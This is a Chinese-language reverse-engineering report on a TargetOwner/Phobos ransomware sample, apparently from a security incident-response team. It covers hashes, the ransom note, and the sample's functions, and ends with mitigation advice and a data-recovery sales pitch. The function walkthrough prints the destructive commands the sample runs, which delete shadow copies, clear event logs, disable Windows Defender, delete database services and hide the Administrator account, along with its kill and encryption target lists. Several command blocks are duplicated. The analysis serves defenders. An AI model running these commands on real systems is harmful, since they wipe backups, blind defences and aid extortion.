01.背景
1.1 前言
新版本的TargetOwner勒索病毒在加密手段上也进行了升级
他们会频繁变换后缀名称,团队近期捕获的后缀多为:".pings"、".phobos". 、".annoy"、".Kastaneya"。该加密器通过FileControls.changePathName函数,将加密的文件名称修改为:UUID + 加密文件后缀的形式,并重新赋值给fileinfo对象的FullName变量。
例如,原文件名“document.docx”会被修改为“123e4567-e89b-12d3-a456-426614174000.phobos”。
1.2 来源
2.恶意文件基础信息
2.1 文件基础信息
| 大小 | 2976768(2.84 MiB) |
|---|---|
| 操作系统 | Windows(95) |
| 架构 | I386 |
| 模式 | 32 位 |
| 类型 | GUI |
| 字节序 | LE |
| MD5 | c509aa60f2c8fdb3eb8e42524cae887a |
| SHA256 | 1dc858b5f215ed1c0b57a4ee2a4e12792eae9c6a181d682b3c5b83f60d303f22 |
| 家族 | TargetOwner |
2.2 勒索信
*** PHOBOS RANSOMWARE ***
--- What happened? ---
All of your files are encrypted and stolen. Stolen data will be published soon
on our tor website. There is no way to recover your data and prevent data leakage without us
Decryption is not possible without private key. Don't waste your and our time to recover your files.
It is impossible without our help
--- Contact Us---
[email protected]
Write this ID in the title of your message
ID:
3.恶意文件分析
3.1 威胁分析
| 病毒家族 |
TargetOwner |
|---|---|
| 首次出现时间/捕获分析时间 | 2024.05.27||2024.06.01 |
| 威胁类型 | 勒索软件,加密病毒 |
| 勒索软件地区 | 俄罗斯 |
| 加密文件扩展名 | .phobos |
| 勒索信文件名 | INFOR.txt |
| 有无免费解密器? | 无 |
| 联系邮箱 | [email protected] |
| 检测名称 | Avast (Win32:RansomX-gen [Ransom]), AhnLab-V3 (Ransomware/Win.Ransom.C5011664), AliCloud (RansomWare), Avast (Win32:RansomX-gen [Ransom]), Avira (no cloud) (HEUR/AGEN.1319014), BitDefenderTheta (Gen:NN.ZexaF.36802.muW@a83MUGci),ClamAV(Win.Ransomware.Rapid-9371249-0),Cybereason(Malicious.0fe686),Cynet(Malicious (score: 100)),DrWeb(Trojan.Encoder.37869),eScan(Trojan.GenericKD.70329037) |
| 感染症状 | 无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(.phobos)。所有加密的文件夹会显示一条勒索要求消息(INFOR.txt)。网络犯罪分子根据不同的用户情况,黑客的开价也不同。 |
| 感染方式 | 受感染的电子邮件附件(宏)、恶意广告、漏洞利用 |
| 受灾影响 | 大部分文件(不包括exe dll等文件,与重要系统文件)都经过加密,如果不支付赎金无法打开。黑客声称拿到了电脑内的重要数据,若不支付赎金则会在黑客的blog上公开 |
3.2 加密前后对比
加密后
解密后
4.逆向分析
4.1 程序的架构:
4.2 初始化入口(Progarm.main函数):
-
"ru":俄语 -
"be":白俄罗斯语 -
"uk":乌克兰语 -
"uz":乌兹别克语 -
"kk":哈萨克语 -
"tg":塔吉克语 -
"ka":格鲁吉亚语 -
"ky":吉尔吉斯语 -
"tk":土库曼语
若是满足上述条件其中之一,该程序都不会启动。
4.3 对KillService中指定的服务进行关闭(startManagementProcess函数):
cmd.exe /c sc stop *sql*
cmd.exe /c wevtutil cl security
cmd.exe /c wevtutil cl system
cmd.exe /c wevtutil cl applocation
cmd.exe /c taskkill /f /im sqlservr.exe
cmd.exe /c sc stop MSSQLSERVER
cmd.exe /c sc delete MSSQLSERVER
cmd.exe /c sc stop MSSQLServerADHelper100
cmd.exe /c sc delete MSSQLServerADHelper100
cmd.exe /c sc stop MSSQLFDLauncher
cmd.exe /c sc delete MSSQLFDLauncher
cmd.exe /c sc stop SQLBrowser
cmd.exe /c sc delete SQLBrowser
cmd.exe /c sc stop SQLWriter
cmd.exe /c sc delete SQLWriter
cmd.exe /c sc stop SQLSERVERAGENT
cmd.exe /c sc delete SQLSERVERAGENT
cmd.exe /c taskkill /f /im oracle.exe
cmd.exe /c sc stop OracleServiceORCL
cmd.exe /c sc delete OracleServiceORCL
cmd.exe /c sc stop OracleOraDb11g_home1TNSListener
cmd.exe /c sc delete OracleOraDb11g_home1TNSListener
cmd.exe /c sc stop OracleOraDb11g_home1ClrAgent
cmd.exe /c sc delete OracleOraDb11g_home1ClrAgent
cmd.exe /c sc stop OracleMTSRecoveryService
cmd.exe /c sc delete OracleMTSRecoveryService
cmd.exe /c sc stop OracleJobSchedulerORCL
cmd.exe /c sc delete OracleJobSchedulerORCL
cmd.exe /c sc stop OracleDBConsoleorcl
cmd.exe /c sc delete OracleDBConsoleorcl
cmd.exe /c sc stop OracleVssWriterORCL
cmd.exe /c sc delete OracleVssWriterORCL
cmd.exe /c taskkill /f /im Mysqld.exe
cmd.exe /c sc stop Mysql
cmd.exe /c sc delete Mysql
cmd.exe /c sc stop OracleDBConsoleorcl
cmd.exe /c sc delete OracleDBConsoleorcl
cmd.exe /c taskkill /f /im notepad.exe
cmd.exe /c ReportingServecesService.exe
cmd.exe /c sc stop ReportingServecesService.exe
cmd.exe /c sc delete ReportingServecesService.exe
cmd.exe /c sc stop sqlservr.exe
cmd.exe /c sc delete sqlservr.exe
cmd.exe /c taskkill /f /im n.exe
cmd.exe /c taskkill /f /im mshta.exe
cmd.exe /c sc stop DuzonDataSafe
cmd.exe /c sc delete DuzonDataSafe
cmd.exe /c sc stop DzKeyLockService
cmd.exe /c sc delete DzKeyLockService
cmd.exe /c sc stop DzServerUpdaterService
cmd.exe /c sc delete DzServerUpdaterService
cmd.exe /c sc stop DzKeyLockDotNetService
cmd.exe /c sc delete DzKeyLockDotNetService
cmd.exe /c sc stop MSSQLFDLauncher
cmd.exe /c sc delete MSSQLFDLauncher
cmd.exe /c sc stop MSSQLServerOLAPService
cmd.exe /c sc delete MSSQLServerOLAPService
cmd.exe /c sc stop MsDtsServer110
cmd.exe /c sc delete MsDtsServer110
cmd.exe /c sc stop MsDtsServer120
cmd.exe /c sc delete MsDtsServer120
cmd.exe /c sc stop ReportServer
cmd.exe /c sc delete ReportServer
4.4 对系统中的服务进行关闭(StopNonSystemServices函数):
4.5 进程终止(KillProcess函数):
Process.GetProcesses() 方法获取当前所有运行的进程,并将其存储在 processes 数组中。
while 循环遍历 processes 数组中的每一个进程,并将进程名称转换为小写并存储在 text 变量中,以便于后面检查使用。
"ali"、"safe"、"360"、"hips" 开头,或包含 "yun"、"java"、"nginx"、"python" 字符串,如果匹配,则终止进程。
anydesk,则不处理,如果进程名称在 killTaskList 列表中,则终止进程。
"msftesql",
"sqlagent",
"sqlbrowser",
"sqlservr",
"sqlwriter",
"oracle",
"ocssd",
"dbsnmp",
"synctime",
"mydesktopqos",
"isqlplussvc",
"xfssvccon",
"mydesktopservice",
"ocautoupds",
"agntsvc",
"encsvc",
"firefoxconfig",
"tbirdconfig",
"ocomm",
"mysqld",
"mysqld-nt",
"mysqld-opt",
"dbeng50",
"sqbcoreservice",
"excel",
"infopath",
"msaccess",
"mspub",
"onenote",
"outlook",
"powerpnt",
"steam",
"thebat",
"thebat64",
"thunderbird",
"visio",
"winword",
"wordpad"
giveupDir 的键值中。如果文件名在 giveupDir 的键值中,则将flag状态设置成true,然后根据flag状态来判断是否终止进程,简单来说就是只要文件名不在giveupDir的键值中,就终止。
WindowsSpeech_OneCore
WindowsSystemApps
WindowsShellExperiences
Windowsservicing
WindowsSystem32
WindowsSysWOW64
WindowsBoot
WindowsWinSxS
Windowsassembly
WindowsMicrosoft.NET
WindowsInstaller
WindowsSoftwareDistribution
WindowsPrefetch
Windowsinf
WindowsTasks
WindowsResources
WindowsSecurity
WindowsServiceProfiles
WindowsSystemResources
WindowsWeb
WindowsHelp
WindowsFonts
ProgramDataMicrosoft
ProgramDataNVIDIA Corporation
ProgramDataAdobe
ProgramDataOracle
ProgramDataDell
ProgramDataIntel
ProgramDataMcAfee
ProgramDataSymantec
ProgramDataKaspersky Lab
ProgramDataAVAST Software
ProgramDataMalwarebytes
ProgramDataPackage Cache
Program Files (x86)Internet Explorer
Program Files (x86)Steam
Program Files (x86)NVIDIA Corporation
Program Files (x86)Intel
Program FilesAdobe
Program FilesInternet Explorer
Program FilesMozilla Firefox
Program FilesGoogle
Program FilesNVIDIA Corporation
Program FilesWindowsApps
Program FilesWindows Defender
Program FilesIntel
Program FilesWindows Photo Viewer
Program FilesWindows Media Player
Program FilesUNP
Program FilesModifiableWindowsApps
Program Files(x86)Microsoft Synchronization Services
Program Files(x86)Microsoft Sync Framework
Program Files(x86)Microsoft Analysis Services
Program Files (x86)Microsoft SDKs
Program Files (x86)MSBuild
Program Files (x86)Reference Assemblies
Program FilesMicrosoft Sync Framework
Program FilesMicrosoft.NET
Program FilesReference Assemblies
Program FilesWindowsPowerShell
Program FilesMSBuild
Program FilesVirtio-Win
Program FilesWindows NT
Program Files (x86)Microsoft.NET
Program Files (x86)Windows NT
Program Files (x86)WindowsPowerShell
Program Files (x86)Windows Media Player
WindowsSystem32
WindowsSysWOW64
WindowsBoot
WindowsWinSxS
Windowsassembly
WindowsMicrosoft.NET
WindowsInstaller
WindowsSoftwareDistribution
WindowsPrefetch
Windowsinf
WindowsTasks
WindowsResources
WindowsSecurity
WindowsServiceProfiles
WindowsSystemResources
WindowsWeb
WindowsHelp
WindowsFonts
ProgramDataMicrosoft
ProgramDataNVIDIA Corporation
ProgramDataAdobe
ProgramDataOracle
ProgramDataDell
ProgramDataIntel
ProgramDataMcAfee
ProgramDataSymantec
ProgramDataKaspersky Lab
ProgramDataAVAST Software
ProgramDataMalwarebytes
ProgramDataPackage Cache
ProgramDataMicrosoft
ProgramDataNVIDIA Corporation
ProgramDataAdobe
ProgramDataOracle
ProgramDataDell
ProgramDataIntel
ProgramDataMcAfee
ProgramDataSymantec
ProgramDataKaspersky Lab
ProgramDataAVAST Software
ProgramDataMalwarebytes
ProgramDataPackage Cache
Program Files (x86)Internet Explorer
Program Files (x86)Steam
Program Files (x86)NVIDIA Corporation
Program Files (x86)Intel
Program FilesAdobe
Program FilesInternet Explorer
Program FilesMozilla Firefox
Program FilesGoogle
Program FilesNVIDIA Corporation
Program FilesWindowsApps
Program FilesWindows Defender
Program FilesIntel
Program FilesWindows Photo Viewer
Program FilesWindows Media Player
Program FilesUNP
Program FilesModifiableWindowsApps
cmd.exe", "/c net stop wscsvc作为其参数,并且设置其属性为用户shell执行、不显示窗口和将程序输出到Stdout。
4.5.1 第一条线程:
将创建一个线程,并且使用CreateProcess函数和ExecutePowerShellScript函数来执行一系列命令
4.5.1.1 CreateProcess 执行命令内容
1. 禁用写缓存:
ManagementProcess.CreateProcess("cmd.exe", "/c 'fsutil behavior set disablewritecache 1'");
2. 禁用删除通知:
ManagementProcess.CreateProcess("cmd.exe", "/c 'fsutil behavior set disabledeletenotify 1'");
3 清理磁盘:
ManagementProcess.CreateProcess("cmd.exe", "/c 'cleanmgr /d C:'");
4 修改注册表设置以增加最大并发数:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f'");
5 禁用 Security Health Service:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f'");
6 删除 Windows Defender 策略注册表键:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f'");
7 禁用 Windows Defender 的 AntiSpyware 和 AntiVirus:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f'");
8 禁用 Windows Defender 的 API Logger:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'");
9 禁用屏幕保护程序:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 0 /f'");
9 禁用 Windows Defender 服务:
ManagementProcess.CreateProcess("cmd.exe", "/c 'sc config WinDefend start=disabled'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'sc stop WinDefend'");
10 移除 Windows Defender 定义:
ManagementProcess.CreateProcess("cmd.exe", "/c 'MpCmdRun.exe -RemoveDefinitions -All'");
11 设置电源配置:
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setacvalueindex SCHEME_CURRENT SUB_PROCESSOR PERFEPP 100'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setacvalueindex SCHEME_CURRENT SUB_PROCESSOR PERFEPP 0'");
12 修改桌面背景颜色和窗口边框颜色:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKCU\Control Panel\Colors" /v Background /t REG_SZ /d 255 0 0 /f'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKCU\Control Panel\Desktop\WindowMetrics" /v BorderColor /t REG_SZ /d 255 0 0 /f'");
13 删除安全启动配置:
ManagementProcess.CreateProcess("cmd.exe", "/c 'bcdedit /deletevalue {current} safeboot'");
1. 禁用写缓存:
ManagementProcess.CreateProcess("cmd.exe", "/c 'fsutil behavior set disablewritecache 1'");
2. 禁用删除通知:
ManagementProcess.CreateProcess("cmd.exe", "/c 'fsutil behavior set disabledeletenotify 1'");
3 清理磁盘:
ManagementProcess.CreateProcess("cmd.exe", "/c 'cleanmgr /d C:'");
4 修改注册表设置以增加最大并发数:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f'");
5 禁用 Security Health Service:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f'");
6 删除 Windows Defender 策略注册表键:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f'");
7 禁用 Windows Defender 的 AntiSpyware 和 AntiVirus:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f'");
8 禁用 Windows Defender 的 API Logger:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'");
9 禁用屏幕保护程序:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 0 /f'");
9 禁用 Windows Defender 服务:
ManagementProcess.CreateProcess("cmd.exe", "/c 'sc config WinDefend start=disabled'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'sc stop WinDefend'");
10 移除 Windows Defender 定义:
ManagementProcess.CreateProcess("cmd.exe", "/c 'MpCmdRun.exe -RemoveDefinitions -All'");
11 设置电源配置:
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setacvalueindex SCHEME_CURRENT SUB_PROCESSOR PERFEPP 100'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setacvalueindex SCHEME_CURRENT SUB_PROCESSOR PERFEPP 0'");
12 修改桌面背景颜色和窗口边框颜色:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKCU\Control Panel\Colors" /v Background /t REG_SZ /d 255 0 0 /f'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKCU\Control Panel\Desktop\WindowMetrics" /v BorderColor /t REG_SZ /d 255 0 0 /f'");
13 删除安全启动配置:
ManagementProcess.CreateProcess("cmd.exe", "/c 'bcdedit /deletevalue {current} safeboot'");
4.5.1.2 ExecutePowerShellScript 执行命令内容
1. 禁用实时保护:
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableRealtimeMonitoring $true");
2. 添加 Windows Defender 排除路径:
ManagementProcess.ExecutePowerShellScript("Add-MpPreference -ExclusionPath C:\");
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus");
3. 禁用 IOAV 保护和脚本扫描:
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableIOAVProtection $true");
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableScriptScanning 1");
4. 移除 Windows Defender 定义:
ManagementProcess.ExecutePowerShellScript("&"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All");
ManagementProcess.ExecutePowerShellScript("&"C:\Program Files\Windows Defender\Mp
执行完上述代码后,会执行DisableWindowsDefenderProtection函数对Windows Defender的关闭还有对Windows安全中心的关闭
4.5.2 第二条线程:
4.5.2.1 删除自启动文件(sellNotInWindowsDirectory函数):
4.5.2.2 停止计划任务(StopAllScheduledTasks函数):
4.5.2.3 禁用.Net日志记录(DisableDotNetLogging函数):
禁用.Net的某些日志记录功能,
利用Environment.OSVersion.Version.Major方法来获得系统的版本,确定当前是w10/7/xp/visa等系统,然后选择对应.net所存在的注册表,然后将以下注册表项的值设置为0。
GeneratePublisherEvidence:禁用程序集发布者证据的生成。
LegacyUnhandledExceptionPolicy:指定处理旧版.NET应用程序中未处理异常的策略。
LegacyImpersonationPolicy:指定旧版.NET应用程序的模拟策略。
ShadowCopyVerifyByTimestamp:禁用根据时间戳验证影子副本缓存中程序集的功能。
AlwaysFlowImpersonationPolicy:禁用始终流动的模拟策略。
4.5.2.4 禁用虚拟内存(DisableVirtualMemory函数):
SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management的子键DisablePagingExecutive的值设置为1来实现。
4.5.2.5 关闭Windows Defender的实时保护(DisableRealTimeProtection函数):
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection的子键DisableRealtimeMonitoring设置为1来实现
4.5.2.6 删除系统还原点(DeleteAllRestorePoints函数):
Get-WmiObject -Namespace "rootdefault" -Class SystemRestore
4.5.2.7 删除所有影卷备份(DeleteAllShadowCopies函数):
vssadmin delete shadows /all /quiet命令来实现,不会带有删除的任何提示。
4.5.2.8 关闭系统睡眠(sysNotSleep函数):
4.5.2.9 删除最近用户使用过的目录文件(clearRecent函数):
删除最近用户使用过的目录文件,通过Environment.SpecialFolder.Recent获取用户最近使用过的文件,然后循环调用Delete函数对其进行删除
4.5.2.10 删除 Windows 远程桌面连接客户端中的条目(clearRdpMru函数):
HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault注册表中的值为MRU+number的项
4.5.2.11 关闭文件共享功能(DisableFileSharing函数):
关闭文件共享功能,通过设置SYSTEMCurrentControlSetServicesLanmanServerParameters注册表的AutoShareWks和AutoShareServer的值为0实现。
-
C:WindowsSystem32WinevtLogs:事件日志文件 -
C:WindowsSystem32LogFilesHTTPERR:HTTP 错误日志文件 -
C:WindowsSystem32LogFilesWMIRtBackup:WMI 实时备份日志 -
C:WindowsSystem32LogFilesScm:服务控制管理器日志 -
C:WindowsPrefetch:预取目录 -
C:WindowsTemp:临时文件目录
4.5.2.12 删除临时目录和清空日志(delDirectory函数):
-
C:WindowsPrefetch:预取目录 -
C:WindowsTemp:临时文件目录
4.5.2.13 CreateProcess 执行命令内容
1. 用于清空进程的工作集内存
cmd /c EmptyWorkingSet
2. 刷新 DNS 缓存
cmd /c ipconfig /flushdns
3. 删除所有 ARP 缓存条目
cmd /c arp -d *
4. 释放内存
cmd /c freemem
4.6 样本自删除(DeleteItself函数):
:del
del "AutoStart.appAllPath"
if exist "AutoStart.appAllPath" goto del
del %0
4.7 加密器初始化(getUidAndPublicKey函数)
4.8 读取配置文件&&初始化加密变量(RSAartifact.fileBytePublicEncryData函数):
4.9 混淆配置文件内容&&删除配置文件(RSAartifact.shatterFile函数):
4.10 加密线程队列初始化(QueueThread.init函数):
4.11 线程启动方法(CallToChildThread函数):
4.12 加密初始化(encrySignificantFile函数):
4.13 加密文件名生成(FileControls.changePathName函数):
4.14 文件加密(FileControls.AesEncryptFile函数):
"h5",
"dcm",
"shp",
"ndf",
"shx",
"orc",
"parquet",
"prj",
"id",
"dat",
"geojson",
"kml",
"nds",
"pmml",
"proto",
"nmea",
"s57",
"rpf",
"onnx",
"pt",
"pb",
"csv",
"eml",
"ghost",
"log",
"bak",
"sql",
"4dd",
"4dl",
"abs",
"abx",
"frm",
"accdb",
"accdc",
"ctl",
"accde",
"pqsql",
"adb",
"adf",
"dmp",
"ckp",
"db",
"json",
"pgdump",
"arc",
"pgdata",
"db-journal",
"db-shm",
"ifx",
"js",
"wal",
"mongodb",
"ns",
"wt",
"rdb",
"mariadb",
"db-wal",
"db2",
"ibd",
"db3",
"dbc",
"dbf",
"dbs",
"dbt",
"dbv",
"dcb",
"doc",
"docx",
"dp1",
"aof",
"mysql",
"myi",
"data",
"dump",
"eco",
"edb",
"database",
"ora",
"epim",
"wdb",
"fcd",
"gdb",
"mdb",
"mdf",
"ldf",
"myd",
"ndf",
"nwdb",
"nyf",
"sqlitedb",
"sqlite3",
"sqlite",
"xls",
"xlsx",
"pdf",
"pst",
"swift",
"fix",
"flt",
"fixm",
"xlsm",
"makop",
"pgp",
"gpg",
"enc"
4.15 计算加密块大小(getReadSize函数):
| 变量名 | 值 | 十六进制 |
|---|---|---|
| FileControls.maxFileLength | 53687091200L | 0xc80000000 |
| FileControls.minFileLength | 10485760L | 0xa00000 |
| FileControls.mbFileLength | 314572800L | 0x12c00000 |
| FileControls.gbFileLength | 1073741824L | 0x40000000 |
4.15.1不在completeSuffix中(encryptRate = 1):
4.15.2 在completeSuffix中(encryptRate = 4):
4.16 开始加密
4.16.1 初始化:
4.16.2 加密流程:
4.16.3 加密核心实现:
4.16.3.1 密钥生成(FileControls.initRandomKey函数):
4.16.3.2 内容加密(chaCha7539Engine.ProcessBytes函数):
| 参数 | 意义 |
|---|---|
| inBytes | 待加密的数据 |
| inoff | 合规检查的标志 |
| len | 待加密的数据长度 |
| outBytes | 加密后的数据 |
| outoff | 合规检查的标志 |
4.17 主要入口(EncryMain.start函数):
C:WindowsSystem32winevtLogs、C:WindowsSystem32winevtLogs、C:Windows\System32\LogFiles\WMI\RtBackup、C:Windows\System32\LogFiles\Scm路径下的文件,寻找适合加密的文件,不写入勒索信,不对文件大小做限制。
cmd.exe", "/c taskkill /f /im " + 当前进程名称的执行,实现了强制终止当前运行的进程,即对自身进程的终止。Process.GetCurrentProcess().Kill函数又一次实现了对自身进程的二次终止,双重保障能干掉自己当前的进程。
4.17.1 创建加密目录&&转移文件(moveErgodicDir函数):
4.17.2 校验文件&&将文件入队(ergodicFiles函数):
| 参数 | 意义 |
|---|---|
| path | 需要处理的路径 |
| size | 加密文件的最小大小 |
| queueKey | 入队键值,根据其值是否为Null,来决定入TaskQueue还是dictionaryTaskQueue |
| isCarteTitle | 勒索信开关标志,如果是True就在该目录下写勒索信 |
"mozilla",
"msocache",
"Windows",
"appdata",
"programdata",
"google",
"application data",
"tor browser",
"system volume information",
"intel",
"boot",
"$windows.~ws",
"$windows.~bt",
"Windows Microsoft.NET",
"WindowsPowerShell",
"Windows NT",
"Microsoft Security Client",
"Internet Explorer",
"Reference",
"Assemblies",
"Windows Defender",
"Microsoft ASP.NET",
"Core Runtime",
"Package",
"Store",
"Microsoft Help Viewer",
"Microsoft MPI",
"Windows Kits",
"Microsoft.NET",
"Windows Mail",
"Microsoft Security Client",
"Package Store",
"Microsoft Analysis Services",
"Windows Portable Devices",
"Windows Photo Viewer",
"Windows Sidebar"
"iso",
"cmd",
"com",
"bat",
"diagpkg",
"dll",
"exe",
"hlp",
"icl",
"icns",
"ico",
"ics",
"idx",
"lnk",
"nomedia",
"rom",
"rtp",
"scr",
"shs",
"sys",
"theme",
"themepack",
"wpx",
"msi"
4.17.3 自定义加密路径(ergodicSignificantDirectory函数):
4.17.4 清空加密密钥&&删除系统注册表等(ManagementProcess.endManagementProcess函数)
#删除注册表键中所有值:
"cmd.exe", "/c 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f'"
#删除注册表键:
"cmd.exe", "/c 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'"
#添加注册表键:
"cmd.exe", "/c 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"'"
#删除 Default.rdp 文件:
"cmd.exe", "/c 'cd %userprofile%\documents && attrib Default.rdp -s -h && del Default.rdp'"
#创建计划任务,每 15 分钟重启一次系统:
"cmd.exe", "/c 'schtasks /Create /SC MINUTE /MO 15 /TN "Restart" /TR "shutdown /r /f /t 0" /RU SYSTEM'"
#添加注册表键,隐藏管理员账号:
"cmd.exe", "/c 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Administrator /t REG_DWORD /d 0 /f'"
4.17.5 计划系统重启(ScheduleRestartAndExit函数):
5.病毒分析概览
6.防范措施
7.安全建议
7.1 风险消减措施
资产梳理排查目标:根据实际情况,对内外网资产进行分时期排查
服务方式:调研访谈、现场勘查、工具扫描
服务关键内容:流量威胁监测系统排查、互联网暴露面扫描服务、技术加固服务、集权系统排查
7.2 安全设备调优
目标
主要目标设备
7.3 全员安全意识增强调优
目标:
形式:
线下培训课表
1.提供相关的安全意识培训材料,由上而下分发学习
2.组织相关人员线上开会学习。线上培训模式。
线上学习平台
8.团队介绍
More
9.数据恢复服务流程
① 免费咨询/数据诊断分析
专业的售前技术顾问服务,免费在线咨询,可第一时间获取数据中毒后的正确处理措施,防范勒索病毒在内网进一步扩散或二次执行,避免错误操作导致数据无法恢复。
售前技术顾问沟通了解客户的机器中毒相关信息,结合团队数据恢复案例库的相同案例进行分析评估,初步诊断分析中毒数据的加密/损坏情况。
② 评估报价/数据恢复方案
您获取售前顾问的初步诊断评估信息后,若同意进行进一步深入的数据恢复诊断,我们将立即安排专业病毒分析工程师及数据恢复工程师进行病毒逆向分析及数据恢复检测分析。
专业数据恢复工程师根据数据检测分析结果,定制数据恢复方案(恢复价格/恢复率/恢复工期),并为您解答数据恢复方案的相关疑问。
③ 确认下单/签订合同
您清楚了解数据恢复方案后,您可自主选择以下下单方式:
双方签署对公合同:根据中毒数据分析情况,量身定制输出数据恢复合同,合同内明确客户的数据恢复内容、数据恢复率、恢复工期及双方权责条款,双方合同签订,正式进入数据恢复专业施工阶段,数据恢复后进行验证确认,数据验证无误,交易完成。
④ 开始数据恢复专业施工
安排专业数据恢复工程师团队全程服务,告知客户数据恢复过程注意事项及相关方案措施,并可根据客户需求及数据情况,可选择上门恢复/远程恢复。
数据恢复过程中,团队随时向您报告数据恢复每一个节点工作进展(数据扫描 → 数据检测 → 数据确认 → 恢复工具定制 → 执行数据恢复 → 数据完整性确认)。
⑤ 数据验收/安全防御方案
完成数据恢复后,我司将安排数据分析工程师进行二次检查确认数据恢复完整性,充分保障客户的数据恢复权益,二次检测确认后,通知客户进行数据验证。
客户对数据进行数据验证完成后,我司将指导后续相关注意事项及安全防范措施,并可提供专业的企业安全防范建设方案及安全顾问服务,抵御勒索病毒再次入侵。
点击关注下方名片进入公众号 了解更多
更多资讯 扫码加入群组交流
喜欢此内容的人还喜欢
索勒安全团队
索勒安全团队
【病毒分析】独家揭秘LIVE勒索病毒家族之1.5(全版本可解密)
索勒安全团队
原文始发于微信公众号(solar专业应急响应团队):【病毒分析】技术全面升级,勒索赎金翻倍,新版本TargetOwner勒索家族强势来袭?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论